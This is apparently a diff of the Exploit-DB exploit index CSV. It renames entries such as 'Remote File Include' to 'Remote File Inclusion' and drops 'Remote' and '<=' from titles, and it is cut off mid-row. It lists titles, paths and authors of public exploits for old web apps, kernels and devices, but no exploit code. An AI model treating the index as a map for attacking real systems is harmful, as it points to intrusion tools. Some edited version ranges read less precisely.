-25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Include Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusion Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25157,platforms/windows/remote/25157.txt,"Microsoft Log Sink Class ActiveX Control Arbitrary File Creation",2003-04-29,"Shane Hird",windows,remote,0 25158,platforms/php/webapps/25158.txt,"OOApp Guestbook Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 @@ -22325,15 +22325,15 @@ id,file,description,date,author,platform,type,port 25169,platforms/php/webapps/25169.pl,"PHPBB 2.0.x - Authentication Bypass (2)",2005-02-28,phuket,php,webapps,0 25170,platforms/php/webapps/25170.cpp,"PHPBB 2.0.x - Authentication Bypass (3)",2005-02-28,overdose,php,webapps,0 25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service Vulnerabilities",2005-02-28,"Luigi Auriemma",multiple,dos,0 -25172,platforms/php/webapps/25172.txt,"PostNuke Phoenix 0.7x CATID Parameter Remote SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 -25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x SHOW Parameter Remote SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 +25172,platforms/php/webapps/25172.txt,"PostNuke Phoenix 0.7x CATID Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 +25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x SHOW Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 25174,platforms/php/webapps/25174.txt,"phpCOIN 1.2 mod.php Multiple Parameter XSS",2005-03-01,Lostmon,php,webapps,0 25175,platforms/php/webapps/25175.txt,"phpCOIN 1.2 login.php Multiple Parameter XSS",2005-03-01,Lostmon,php,webapps,0 25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x SendPM.php Directory Traversal",2005-03-01,Raven,php,webapps,0 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 X-Forwarded-For Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 -25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - Auth.php Remote File Include",2005-03-01,mozako,php,webapps,0 +25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - Auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0 25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote PNG Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,remote,0 25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0 25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i Multiple Remote Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 @@ -22367,7 +22367,7 @@ id,file,description,date,author,platform,type,port 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 -25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Include",2005-03-14,SmOk3,php,webapps,0 +25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 @@ -22384,7 +22384,7 @@ id,file,description,date,author,platform,type,port 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0 -25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Include",2005-03-21,Frank_Reiner,php,webapps,0 +25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0 25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - CSRF Add Admin Exploit",2013-05-06,Fallaga,php,webapps,0 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0 @@ -22426,10 +22426,10 @@ id,file,description,date,author,platform,type,port 25283,platforms/php/webapps/25283.txt,"Nuke Bookmarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 -25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Include",2005-03-26,Dcrab,php,webapps,0 +25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Inclusion",2005-03-26,Dcrab,php,webapps,0 25287,platforms/linux/dos/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)",2005-03-28,"ilja van sprundel",linux,dos,0 25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root (2)",2005-04-08,qobaiashi,linux,local,0 -25289,platforms/linux/local/25289.c,"Linux Kernel <= 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root",2005-10-19,backdoored.net,linux,local,0 +25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root",2005-10-19,backdoored.net,linux,local,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,Metasploit,linux,remote,80 @@ -22444,16 +22444,16 @@ id,file,description,date,author,platform,type,port 25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client Env_opt_add Heap-Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0 -33406,platforms/php/webapps/33406.txt,"Horde <= 3.3.5 Administration Interface admin/phpshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33407,platforms/php/webapps/33407.txt,"Horde <= 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33408,platforms/php/webapps/33408.txt,"Horde <= 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 Administration Interface admin/phpshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 showgallery.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 showmembers.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 slideshow.php photo Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 25311,platforms/php/webapps/25311.txt,"PhotoPost Pro 5.1 showmembers.php sl Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 25312,platforms/php/webapps/25312.txt,"PhotoPost Pro 5.1 showphoto.php photo Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 25313,platforms/asp/webapps/25313.txt,"ACS Blog 0.8/0.9/1.0/1.1 Name Field HTML Injection",2005-03-28,"Dan Crowley",asp,webapps,0 -25314,platforms/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Include",2005-03-29,"hoang yen",php,webapps,0 +25314,platforms/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Inclusion",2005-03-29,"hoang yen",php,webapps,0 25315,platforms/php/webapps/25315.html,"Chatness 2.5 Message Form Field HTML Injection",2005-03-29,3nitro,php,webapps,0 25316,platforms/php/webapps/25316.txt,"CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-29,mircia,php,webapps,0 25317,platforms/php/webapps/25317.txt,"Uapplication Ublog 1.0.x - Cross-Site Scripting",2005-03-29,"PersianHacker Team",php,webapps,0 @@ -22466,7 +22466,7 @@ id,file,description,date,author,platform,type,port 25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0 25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 Object Push Service Bluetooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0 -25327,platforms/php/webapps/25327.txt,"AlstraSoft EPay Pro 2.0 - Remote File Include",2005-04-01,Dcrab,php,webapps,0 +25327,platforms/php/webapps/25327.txt,"AlstraSoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0 25328,platforms/php/webapps/25328.txt,"AlstraSoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 25329,platforms/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",windows,dos,0 25330,platforms/php/webapps/25330.txt,"phpMyAdmin 2.x - Convcharset Cross-Site Scripting",2005-04-03,"Oriol Torrent Santiago",php,webapps,0 @@ -22507,7 +22507,7 @@ id,file,description,date,author,platform,type,port 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 OP Parameter Remote Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 Module Parameter Remote Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 -25368,platforms/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 SID Parameter Remote SQL Injection",2005-04-08,Dcrab,php,webapps,0 +25368,platforms/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 SID Parameter SQL Injection",2005-04-08,Dcrab,php,webapps,0 25369,platforms/php/webapps/25369.txt,"RadScripts RadBids Gold 2.0 - index.php read Parameter Traversal Arbitrary File Access",2005-04-09,Dcrab,php,webapps,0 25370,platforms/php/webapps/25370.txt,"RadScripts RadBids Gold 2.0 - index.php mode Parameter SQL Injection",2005-04-09,Dcrab,php,webapps,0 25371,platforms/php/webapps/25371.txt,"RadScripts RadBids Gold 2.0 - faq.php farea Parameter XSS",2005-04-09,Dcrab,php,webapps,0 @@ -22560,7 +22560,7 @@ id,file,description,date,author,platform,type,port 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - (.m3u) Buffer Overflow Exploit (SEH)",2013-05-13,seaofglass,windows,local,0 25420,platforms/multiple/remote/25420.txt,"IBM WebSphere 5.0/5.1/6.0 Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote,0 25421,platforms/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Remote Cross-Site Scripting",2005-04-15,"Oliver Karow",windows,remote,0 -25422,platforms/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 Index.php Arbitrary Remote File Include",2005-04-14,"Francisco Alisson",php,webapps,0 +25422,platforms/php/webapps/25422.txt,"All4WWW-HomePageCreator 1.0 Index.php Arbitrary Remote File Inclusion",2005-04-14,"Francisco Alisson",php,webapps,0 25423,platforms/php/webapps/25423.txt,"SPHPBlog 0.4 - Search.php Cross-Site Scripting",2005-04-14,y3dips,php,webapps,0 25424,platforms/asp/webapps/25424.txt,"OneWorldStore OWAddItem.ASP SQL Injection",2005-04-14,Dcrab,asp,webapps,0 25425,platforms/asp/webapps/25425.txt,"OneWorldStore OWListProduct.ASP Multiple SQL Injection Vulnerabilities",2005-04-14,Dcrab,asp,webapps,0 @@ -22569,7 +22569,7 @@ id,file,description,date,author,platform,type,port 25428,platforms/asp/webapps/25428.txt,"OneWorldStore OWListProduct.ASP Cross-Site Scripting",2005-04-14,Dcrab,asp,webapps,0 25429,platforms/linux/dos/25429.c,"Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness",2005-04-15,Overflow.pl,linux,dos,0 25430,platforms/php/webapps/25430.txt,"PHP-Nuke 7.6 Surveys Module HTTP Response Splitting",2005-04-15,Dcrab,php,webapps,0 -25431,platforms/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Include",2006-10-19,"Fidel Costa",php,webapps,0 +25431,platforms/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Inclusion",2006-10-19,"Fidel Costa",php,webapps,0 25432,platforms/php/webapps/25432.txt,"PHPBB Remote Mod.php SQL Injection",2005-04-16,"tom cruise",php,webapps,0 25433,platforms/php/webapps/25433.txt,"Datenbank Module For PHPBB Remote Mod.php Cross-Site Scripting",2005-04-16,"tom cruise",php,webapps,0 25434,platforms/php/webapps/25434.txt,"eGroupWare 1.0 index.php Multiple Parameter XSS",2005-04-18,"GulfTech Security",php,webapps,0 @@ -22590,8 +22590,8 @@ id,file,description,date,author,platform,type,port 25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - CSRF",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 -25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection (1)",2007-02-23,bunker,multiple,remote,0 -25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 +25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database SUBSCRIPTION_NAME SQL Injection (1)",2007-02-23,bunker,multiple,remote,0 +25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database SUBSCRIPTION_NAME SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 25454,platforms/windows/remote/25454.txt,"Microsoft Windows 98/2000 Explorer Preview Pane Script Injection",2005-04-19,"GreyMagic Software",windows,remote,0 25455,platforms/asp/webapps/25455.txt,"OneWorldStore DisplayResults.ASP SQL Injection",2005-04-19,Lostmon,asp,webapps,0 25456,platforms/asp/webapps/25456.txt,"OneWorldStore DisplayResults.ASP Cross-Site Scripting",2005-04-19,Lostmon,asp,webapps,0 @@ -22665,19 +22665,19 @@ id,file,description,date,author,platform,type,port 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 Default.ASP Multiple SQL Injection Vulnerabilities",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 Set_Lang File Include",2005-04-26,"Max Cerny",php,webapps,0 -25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x Unspecified Remote File Include",2005-04-24,"James Bercegay",php,webapps,0 +25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 25533,platforms/php/webapps/25533.txt,"Yappa-NG 1.x/2.x Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 25534,platforms/php/webapps/25534.txt,"SQWebmail 3.x/4.0 HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0 -25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 IntProdID Parameter Remote SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 StrCatalog_NAME Parameter Remote SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 Error.php Remote File Include",2005-04-26,Kold,php,webapps,0 -25539,platforms/asp/webapps/25539.txt,"MetaCart2 - IntCatalogID Parameter Remote SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25540,platforms/asp/webapps/25540.txt,"MetaCart2 - StrSubCatalogID Parameter Remote SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25541,platforms/asp/webapps/25541.txt,"MetaCart2 - CurCatalogID Parameter Remote SQL Injection",2005-04-26,Dcrab,asp,webapps,0 -25542,platforms/asp/webapps/25542.txt,"MetaCart2 strSubCatalog_NAME Parameter Remote SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 StrCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 Error.php Remote File Inclusion",2005-04-26,Kold,php,webapps,0 +25539,platforms/asp/webapps/25539.txt,"MetaCart2 - IntCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25540,platforms/asp/webapps/25540.txt,"MetaCart2 - StrSubCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25541,platforms/asp/webapps/25541.txt,"MetaCart2 - CurCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25542,platforms/asp/webapps/25542.txt,"MetaCart2 strSubCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25543,platforms/asp/webapps/25543.txt,"MetaCart2 - SearchAction.ASP Multiple SQL Injection Vulnerabilities",2005-04-26,Dcrab,asp,webapps,0 -25544,platforms/asp/webapps/25544.txt,"MetaBid Auctions intAuctionID Parameter Remote SQL Injection",2005-04-26,Dcrab,asp,webapps,0 +25544,platforms/asp/webapps/25544.txt,"MetaBid Auctions intAuctionID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25545,platforms/php/webapps/25545.txt,"BBlog 0.7.4 PostID Parameter SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps,0 25546,platforms/windows/remote/25546.txt,"BEA WebLogic Server 8.1 And WebLogic Express Administration Console Cross-Site Scripting",2005-04-26,"Alexander Kornbrust",windows,remote,0 25547,platforms/linux/remote/25547.pl,"Convert-UUlib 1.04/1.05 Perl Module Buffer Overflow",2005-04-26,CorryL,linux,remote,0 @@ -22742,7 +22742,7 @@ id,file,description,date,author,platform,type,port 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,Metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h OS Command Injection",2013-05-21,Metasploit,hardware,remote,80 25611,platforms/windows/dos/25611.txt,"Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 -30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Include Vulnerabilities",2007-05-28,"Hasadya Raed",php,webapps,0 +30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Inclusion Vulnerabilities",2007-05-28,"Hasadya Raed",php,webapps,0 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0 25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 Index.php Cross-Site Scripting",2005-06-14,An0nym0uS,php,webapps,0 25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0 @@ -22842,7 +22842,7 @@ id,file,description,date,author,platform,type,port 25701,platforms/asp/webapps/25701.txt,"Spread The Word Multiple SQL Injection Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0 25703,platforms/solaris/local/25703.txt,"Active News Manager LOGIN.ASP SQL Injection",2005-05-25,Romty,solaris,local,0 -25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 Poll_Vote.php Remote File Include",2005-05-25,"rash ilusion",php,webapps,0 +25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 Poll_Vote.php Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 Login.ASP SQL Injection",2005-05-25,Romty,asp,webapps,0 25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 Mail Email Header Buffer Overflow",2004-08-10,infamous41md,linux,remote,0 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0 @@ -22854,7 +22854,7 @@ id,file,description,date,author,platform,type,port 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0 25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 -25716,platforms/php/webapps/25716.py,"AVE.CMS <= 2.09 (index.php module param) - Blind SQL Injection Exploit",2013-05-26,mr.pr0n,php,webapps,0 +25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 (index.php module param) - Blind SQL Injection Exploit",2013-05-26,mr.pr0n,php,webapps,0 25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 25719,platforms/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,windows,dos,0 25721,platforms/php/webapps/25721.txt,"WordPress User Role Editor Plugin 3.12 - CSRF",2013-05-26,"Henry Hoggard",php,webapps,0 @@ -22913,9 +22913,9 @@ id,file,description,date,author,platform,type,port 33411,platforms/php/webapps/33411.txt,"iSupport 1.8 ticket_function.php Multiple Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0 33412,platforms/php/webapps/33412.txt,"iSupport 1.8 index.php which Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0 33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 - 'core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,php,webapps,0 -33414,platforms/php/remote/33414.php,"PHP <= 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting (1)",2009-12-17,hello@iwamot.com,php,remote,0 -33415,platforms/php/remote/33415.php,"PHP <= 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting (2)",2009-12-17,hello@iwamot.com,php,remote,0 -33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Parameter Local File Include",2009-12-17,"Juan Galiana Lara",php,webapps,0 +33414,platforms/php/remote/33414.php,"PHP 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting (1)",2009-12-17,hello@iwamot.com,php,remote,0 +33415,platforms/php/remote/33415.php,"PHP 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting (2)",2009-12-17,hello@iwamot.com,php,remote,0 +33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Parameter Local File Inclusion",2009-12-17,"Juan Galiana Lara",php,webapps,0 33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component - 'secid' Parameter SQL Injection",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 33419,platforms/php/webapps/33419.txt,"F3Site 2009 - mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 @@ -22925,7 +22925,7 @@ id,file,description,date,author,platform,type,port 33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0 33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0 33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80 -25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Include",2005-05-31,"SoulBlack Group",php,webapps,0 +25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2005-05-31,"Alberto Trivero",php,webapps,0 25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 Login.ASP SQL Injection",2005-06-01,Romty,asp,webapps,0 @@ -22934,13 +22934,13 @@ id,file,description,date,author,platform,type,port 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 LOGIN.ASP SQL Injection",2005-06-01,"Dj romty",asp,webapps,0 25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi 